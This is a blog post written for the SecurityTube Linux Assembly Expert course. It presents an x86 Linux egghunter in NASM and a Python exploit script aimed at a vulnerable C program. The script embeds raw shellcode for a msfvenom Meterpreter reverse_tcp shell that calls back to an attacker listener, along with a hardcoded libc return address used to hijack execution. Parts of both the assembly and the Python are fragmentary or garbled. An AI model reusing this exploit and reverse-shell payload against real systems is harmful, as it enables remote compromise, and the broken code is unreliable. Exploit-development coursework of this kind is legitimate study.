SLAE: 0x3 Egghunters

Sun 02 April 2017

0x1 Requirements

Write a custom egghunter that works with custom shellcode

Writing a custom egghunter that will use the address pointed to in esp as a starting point and go up or down depending on if the first command in the loop function is increase by 1 or substract by 1

While looking through examples on shellstorm I saw the idea of substracting 1 byte from the egg itself in order to avoid a duplicate egg in the completed shellcode which I found nice so I've implemented this in my egghunter.

0x2 Demo: putting it all together

0x3 Code walkthrough

; Filename: small_egghunter.nasm
; Author:  Plaix
; Website:
; Purpose: 
; Searches up or down for our egg, which is only 4 bytes 

; Compile:
; --------
; nasm -f elf32 -o $small_egghunter.o $template.nasm
; ld -o $small_egghunter $template.o

global _start           

section .text

    mov eax,esp ; get an addres on the stack that's valid
    ; we will mov 0xdeadbeee into ebx instead of our egg
    ; and inc it by 1 to avoid our egghunter finding the 0xdeadbeef value in ebx
    ; instead of at the right spot
    mov ebx,0xdeadbeee
    inc ebx

    inc eax
    cmp dword [eax],ebx
    jnz loop
    ; if the egg is found
    ; play nice with the python script
    add eax,0x4
    push eax

0x4 Example

I've included a vuln.c program and this python script which will use the egghunter and a generated linux meterpreter reverse_tcp shell to exploit the program


import os

import subprocess

# egghunter 60 bytes
# shellcode 500 bytes


 linux/x86/meterpreter/reverse_tcp LHOST=192.168/56.10 LPORT=4444
 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost= -f py  -b "\x00\x0a\xff\x60\x22\x27\x28\x29"
 482 bytes


buf =  ""
buf += "\xd9\xe8\xbf\xf6\xd0\x96\x16\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x12\x31\x7d\x1a\x03\x7d\x1a\x83\xc5\x04\xe2"
buf += "\x03\xe1\x4d\xe1\x08\x51\x31\x5d\xa4\x54\x05\x07\xb1"
buf += "\xb8\xa8\x48\x56\x61\x5b\x89\xf0\xae\x91\x61\x02\xcf"
buf += "\xb4\x2d\x8b\x2e\xdc\xab\xd3\xe0\x70\x63\x6a\xe1\x30"
buf += "\x46\xec\x50\xb1\xe1\xec\x84\xbe\x11\x65\x47\x7f\xfa"
buf += "\x79\x49\x63\xf1\x31\x34\xa9\x8a\x6a\x4e\xd0\x12\x3a"
buf += "\x5c\xa3\x26\x8f\xdd\x3c\xc9"

print "Prepending shellcode with %i nops..." % (500-(len(buf)+4))



#for x in range(len(shellcode)):
#    print "%i\t%s\t\\x%02x" % (x,shellcode[x],ord(shellcode[x]))

EIP="\xf2\x1c\xe4\xb7" # libc JMP eax

# run the exploit
#os.system("gdb -q --args ./vuln "+shBuf+" "+eggBuf)

#os.system("./vuln "+shBuf+" "+ eggBuf)'gdb -q --args ./vuln \"'+ shBuf +"\" \""+ eggBuf+"\"",shell=True)'./vuln \"'+ shBuf +"\" \""+ eggBuf+"\"",shell=True)

0x0 Resources used:


Linux man pages:

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE - 827